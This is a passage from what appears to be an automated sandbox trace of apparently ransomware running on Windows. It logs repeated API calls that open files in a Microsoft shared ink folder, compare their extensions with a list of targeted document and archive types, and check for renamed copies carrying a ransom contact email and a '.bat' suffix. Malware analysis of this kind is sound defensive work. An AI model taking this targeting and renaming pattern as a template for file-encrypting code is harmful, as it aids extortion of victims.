(in: hFile=0x414, lpFileSize=0x363ff14 | out: lpFileSize=0x363ff14*=903) returned 1 [0158.093] CloseHandle (hObject=0x414) returned 1 [0158.093] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml")) returned 0x20 [0158.093] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.093] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.093] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0158.093] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0158.093] lstrlenW (lpString=".doc") returned 4 [0158.093] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.093] lstrlenW (lpString=".docx") returned 5 [0158.093] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0158.093] lstrlenW (lpString=".pdf") returned 4 [0158.093] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.093] lstrlenW (lpString=".xls") returned 4 [0158.093] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.094] lstrlenW (lpString=".xlsx") returned 5 [0158.094] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0158.094] lstrlenW (lpString=".ppt") returned 4 [0158.094] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0158.094] lstrlenW (lpString=".zip") returned 4 [0158.094] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.094] lstrlenW (lpString=".rar") returned 4 [0158.094] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.094] lstrlenW (lpString=".bz2") returned 4 [0158.094] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.094] lstrlenW (lpString=".7z") returned 3 [0158.094] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0158.094] lstrlenW (lpString=".dbf") returned 4 [0158.094] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0158.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0158.094] lstrlenW (lpString=".1cd") returned 4 [0158.094] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0158.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0158.094] lstrlenW (lpString=".jpg") returned 4 [0158.094] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0158.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0158.094] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0158.094] lstrlenW (lpString=".doc") returned 4 [0158.094] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.094] lstrlenW (lpString=".docx") returned 5 [0158.095] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0158.095] lstrlenW (lpString=".pdf") returned 4 [0158.095] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.095] lstrlenW (lpString=".xls") returned 4 [0158.095] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.095] lstrlenW (lpString=".xlsx") returned 5 [0158.095] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0158.095] lstrlenW (lpString=".ppt") returned 4 [0158.095] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.095] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0158.095] lstrlenW (lpString=".zip") returned 4 [0158.095] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.095] lstrlenW (lpString=".rar") returned 4 [0158.095] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.095] lstrlenW (lpString=".bz2") returned 4 [0158.095] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.095] lstrlenW (lpString=".7z") returned 3 [0158.095] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.095] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0158.095] lstrlenW (lpString=".dbf") returned 4 [0158.095] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0158.095] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0158.095] lstrlenW (lpString=".1cd") returned 4 [0158.095] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0158.095] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 86 [0158.095] lstrlenW (lpString=".jpg") returned 4 [0158.095] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0158.096] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0158.096] lstrlenW (lpString="baseAltGr_rtl.xml") returned 17 [0158.096] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.100] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x363ff14 | out: lpFileSize=0x363ff14*=247) returned 1 [0158.100] CloseHandle (hObject=0x414) returned 1 [0158.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml")) returned 0x20 [0158.100] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.100] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0158.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0158.100] lstrlenW (lpString=".doc") returned 4 [0158.100] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.100] lstrlenW (lpString=".docx") returned 5 [0158.100] lstrcmpiW (lpString1=".docx", lpString2="l.xml") returned -1 [0158.101] lstrlenW (lpString=".pdf") returned 4 [0158.101] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.101] lstrlenW (lpString=".xls") returned 4 [0158.101] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.101] lstrlenW (lpString=".xlsx") returned 5 [0158.101] lstrcmpiW (lpString1=".xlsx", lpString2="l.xml") returned -1 [0158.101] lstrlenW (lpString=".ppt") returned 4 [0158.101] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0158.101] lstrlenW (lpString=".zip") returned 4 [0158.101] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.101] lstrlenW (lpString=".rar") returned 4 [0158.101] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.101] lstrlenW (lpString=".bz2") returned 4 [0158.101] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.101] lstrlenW (lpString=".7z") returned 3 [0158.101] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0158.101] lstrlenW (lpString=".dbf") returned 4 [0158.101] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0158.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0158.101] lstrlenW (lpString=".1cd") returned 4 [0158.102] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0158.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0158.102] lstrlenW (lpString=".jpg") returned 4 [0158.102] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0158.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0158.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0158.102] lstrlenW (lpString=".doc") returned 4 [0158.102] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.102] lstrlenW (lpString=".docx") returned 5 [0158.102] lstrcmpiW (lpString1=".docx", lpString2="l.xml") returned -1 [0158.102] lstrlenW (lpString=".pdf") returned 4 [0158.102] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.102] lstrlenW (lpString=".xls") returned 4 [0158.102] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.102] lstrlenW (lpString=".xlsx") returned 5 [0158.102] lstrcmpiW (lpString1=".xlsx", lpString2="l.xml") returned -1 [0158.102] lstrlenW (lpString=".ppt") returned 4 [0158.102] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0158.102] lstrlenW (lpString=".zip") returned 4 [0158.102] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.102] lstrlenW (lpString=".rar") returned 4 [0158.102] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.103] lstrlenW (lpString=".bz2") returned 4 [0158.103] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.103] lstrlenW (lpString=".7z") returned 3 [0158.103] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0158.103] lstrlenW (lpString=".dbf") returned 4 [0158.103] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0158.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0158.103] lstrlenW (lpString=".1cd") returned 4 [0158.103] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0158.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 87 [0158.103] lstrlenW (lpString=".jpg") returned 4 [0158.103] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0158.103] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0158.103] lstrlenW (lpString="base_altgr.xml") returned 14 [0158.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.104] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x363ff14 | out: lpFileSize=0x363ff14*=3524) returned 1 [0158.104] CloseHandle (hObject=0x414) returned 1 [0158.104] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml")) returned 0x20 [0158.104] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.104] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.104] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0158.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0158.105] lstrlenW (lpString=".doc") returned 4 [0158.105] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.105] lstrlenW (lpString=".docx") returned 5 [0158.105] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0158.105] lstrlenW (lpString=".pdf") returned 4 [0158.105] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.105] lstrlenW (lpString=".xls") returned 4 [0158.105] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.105] lstrlenW (lpString=".xlsx") returned 5 [0158.105] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0158.105] lstrlenW (lpString=".ppt") returned 4 [0158.105] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0158.105] lstrlenW (lpString=".zip") returned 4 [0158.105] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.105] lstrlenW (lpString=".rar") returned 4 [0158.105] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.105] lstrlenW (lpString=".bz2") returned 4 [0158.105] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.105] lstrlenW (lpString=".7z") returned 3 [0158.105] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0158.105] lstrlenW (lpString=".dbf") returned 4 [0158.106] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0158.106] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0158.106] lstrlenW (lpString=".1cd") returned 4 [0158.106] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0158.106] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0158.106] lstrlenW (lpString=".jpg") returned 4 [0158.106] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0158.106] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0158.106] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0158.106] lstrlenW (lpString=".doc") returned 4 [0158.106] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.106] lstrlenW (lpString=".docx") returned 5 [0158.106] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0158.106] lstrlenW (lpString=".pdf") returned 4 [0158.106] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.106] lstrlenW (lpString=".xls") returned 4 [0158.106] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.106] lstrlenW (lpString=".xlsx") returned 5 [0158.106] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0158.106] lstrlenW (lpString=".ppt") returned 4 [0158.106] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.106] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0158.107] lstrlenW (lpString=".zip") returned 4 [0158.107] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.107] lstrlenW (lpString=".rar") returned 4 [0158.107] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.107] lstrlenW (lpString=".bz2") returned 4 [0158.107] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.107] lstrlenW (lpString=".7z") returned 3 [0158.107] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.107] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0158.107] lstrlenW (lpString=".dbf") returned 4 [0158.107] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0158.107] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0158.107] lstrlenW (lpString=".1cd") returned 4 [0158.107] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0158.107] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 84 [0158.107] lstrlenW (lpString=".jpg") returned 4 [0158.107] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0158.107] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0158.108] lstrlenW (lpString="base_ca.xml") returned 11 [0158.108] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.108] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x363ff14 | out: lpFileSize=0x363ff14*=3529) returned 1 [0158.108] CloseHandle (hObject=0x414) returned 1 [0158.108] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml")) returned 0x20 [0158.109] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.109] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0158.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0158.109] lstrlenW (lpString=".doc") returned 4 [0158.109] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.109] lstrlenW (lpString=".docx") returned 5 [0158.109] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0158.109] lstrlenW (lpString=".pdf") returned 4 [0158.109] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.109] lstrlenW (lpString=".xls") returned 4 [0158.109] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.109] lstrlenW (lpString=".xlsx") returned 5 [0158.109] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0158.109] lstrlenW (lpString=".ppt") returned 4 [0158.109] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0158.109] lstrlenW (lpString=".zip") returned 4 [0158.109] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.109] lstrlenW (lpString=".rar") returned 4 [0158.109] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.110] lstrlenW (lpString=".bz2") returned 4 [0158.110] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.110] lstrlenW (lpString=".7z") returned 3 [0158.110] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.110] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0158.110] lstrlenW (lpString=".dbf") returned 4 [0158.110] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0158.110] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0158.110] lstrlenW (lpString=".1cd") returned 4 [0158.110] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0158.110] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0158.110] lstrlenW (lpString=".jpg") returned 4 [0158.110] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0158.110] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0158.110] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0158.110] lstrlenW (lpString=".doc") returned 4 [0158.110] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.110] lstrlenW (lpString=".docx") returned 5 [0158.110] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0158.110] lstrlenW (lpString=".pdf") returned 4 [0158.110] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.110] lstrlenW (lpString=".xls") returned 4 [0158.110] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.110] lstrlenW (lpString=".xlsx") returned 5 [0158.110] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0158.110] lstrlenW (lpString=".ppt") returned 4 [0158.110] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.110] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0158.110] lstrlenW (lpString=".zip") returned 4 [0158.110] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.110] lstrlenW (lpString=".rar") returned 4 [0158.110] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.111] lstrlenW (lpString=".bz2") returned 4 [0158.111] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.111] lstrlenW (lpString=".7z") returned 3 [0158.111] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.111] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0158.111] lstrlenW (lpString=".dbf") returned 4 [0158.111] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0158.111] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0158.111] lstrlenW (lpString=".1cd") returned 4 [0158.111] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0158.111] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 81 [0158.111] lstrlenW (lpString=".jpg") returned 4 [0158.111] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0158.111] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0158.111] lstrlenW (lpString="base_heb.xml") returned 12 [0158.111] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.112] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x363ff14 | out: lpFileSize=0x363ff14*=738) returned 1 [0158.112] CloseHandle (hObject=0x414) returned 1 [0158.112] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml")) returned 0x20 [0158.113] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.113] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.113] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0158.113] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0158.113] lstrlenW (lpString=".doc") returned 4 [0158.113] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.113] lstrlenW (lpString=".docx") returned 5 [0158.113] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0158.113] lstrlenW (lpString=".pdf") returned 4 [0158.113] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.113] lstrlenW (lpString=".xls") returned 4 [0158.113] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.113] lstrlenW (lpString=".xlsx") returned 5 [0158.113] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0158.113] lstrlenW (lpString=".ppt") 